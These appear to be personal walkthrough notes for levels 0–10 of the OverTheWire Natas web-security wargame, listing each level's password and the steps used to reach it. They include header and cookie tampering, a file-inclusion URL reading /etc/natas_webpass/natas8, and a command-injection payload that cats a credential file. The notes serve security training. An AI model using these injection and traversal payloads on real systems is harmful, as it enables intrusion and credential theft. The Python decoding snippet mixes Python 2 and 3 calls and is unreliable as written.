lvl 0:
-----------
http://natas0.natas.labs.overthewire.org/
natas0 : natas0


lvl 1:
-----------
ctrl + U 
<!--The password for natas1 is g9D9cREhslqBKtcA2uocGHPfMZVzeFK6 -->



lvl 2:
-----------
ctrl + U
<!--The password for natas2 is h4ubbcXrWqsTo7GGnnUMLppXbOogfBZ7 -->


lvl 3:
-----------
ctrl + U
->
http://natas2.natas.labs.overthewire.org/
->
<img src="files/pixel.png">
->
http://natas2.natas.labs.overthewire.org/files
->
http://natas2.natas.labs.overthewire.org/files/users.txt
->
# username:password
alice:BYNdCesZqW
bob:jw2ueICLvT
charlie:G5vCxkVV3m
natas3:G6ctbMJ5Nb4cbFwhpMPSvxGHhQ7I6W8Q
eve:zo4mJWyNj2
mallory:9urtcpzBmH
->
G6ctbMJ5Nb4cbFwhpMPSvxGHhQ7I6W8Q


lvl 4:
-----------
http://natas3.natas.labs.overthewire.org/robots.txt
->
User-agent: *
Disallow: /s3cr3t/
->
http://natas3.natas.labs.overthewire.org/s3cr3t/
->
http://natas3.natas.labs.overthewire.org/s3cr3t/users.txt
->
natas4 : tKOcJIbzM4lTs8hbCmzn5Zr4434fGZQm



lvl 5:
-----------
open burp
->
change refered in request from
->
Referer: http://natas4.natas.labs.overthewire.org/
->
to
->
Referer: http://natas5.natas.labs.overthewire.org/
->
Access granted. The password for natas5 is Z0NsrtIkJoKALBCLi5eqFfcRN82Au2oD 


lvl 6:
-----------
open burp
->
Cookie: loggedin=0
->
Cookie: loggedin=1
->
 Access granted. The password for natas6 is fOIvE0MDtPTgRhqmmvvAOt2EfXR6uQgR



lvl 7:
-----------
click View sourcecode
->

<?

include "includes/secret.inc";

    if(array_key_exists("submit", $_POST)) {
        if($secret == $_POST['secret']) {
        print "Access granted. The password for natas7 is <censored>";
    } else {
        print "Wrong secret";
    }
    }
?>

->
include "includes/secret.inc";
->
http://natas6.natas.labs.overthewire.org/includes/secret.inc
->
ctrl + U
->
<?
  $secret = "FOEIUWGHFEEUHOFUOIU";
?>

->
enter in input secret 
->
Access granted. The password for natas7 is jmxSiH3SP6Sonf8dv66ng8v1cIEdjXWr 



lvl 8:
-----------
click home / about
->
http://natas7.natas.labs.overthewire.org/index.php?page=home
->
<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->
->
/etc/natas_webpass/natas8
->
http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8
->
a6bZCNYwdKqN5cGP11ZdtPg0iImQQhAB 


lvl 9:
-----------

->
click View sourcecode
->

<?

$encodedSecret = "3d3d516343746d4d6d6c315669563362";

function encodeSecret($secret) {
    return bin2hex(strrev(base64_encode($secret)));
}

if(array_key_exists("submit", $_POST)) {
    if(encodeSecret($_POST['secret']) == $encodedSecret) {
    print "Access granted. The password for natas9 is <censored>";
    } else {
    print "Wrong secret";
    }
}
?>

->
encoded_secret = "3d3d516343746d4d6d6c315669563362"

# Reverse process:
# Step 1: Convert hex to binary
binary_secret = bytes.fromhex(encoded_secret)

# Step 2: Reverse the binary string
reversed_binary_secret = binary_secret[::-1]

# Step 3: Decode the base64 encoded string
original_secret = reversed_binary_secret.decode('base64')

original_secret
->
Sda6t0vkOPkM8YeOZkAGVhFoaplvlJFd


lvl 10:
-----------
->
; cat /etc/natas_webpass/natas10 &&
->
D44EcsFkLxPIkAAKLosx8z3hxX1Z4MCE
->

lvl 11:
-----------
->
->
->
->
->

lvl 12:
-----------

->
->
->
->
->

lvl 13:
-----------

->
->
->
->
->

lvl 14:
-----------

->
->
->
->
->

lvl 15:
-----------
->
->
->
->
->

lvl 16:
-----------


lvl 17:
-----------


lvl 18:
-----------



lvl 19:
-----------


lvl 20:
-----------

lvl 21:
-----------

lvl 22:
-----------
lvl 23:
-----------
lvl 24:
-----------
lvl 25:
-----------
lvl 26:
-----------
lvl 27:
-----------
lvl 28:
-----------
lvl 29:
-----------
lvl 30:
-----------
lvl 31:
-----------
lvl 32:
-----------
lvl 33:
-----------
lvl 34:
-----------
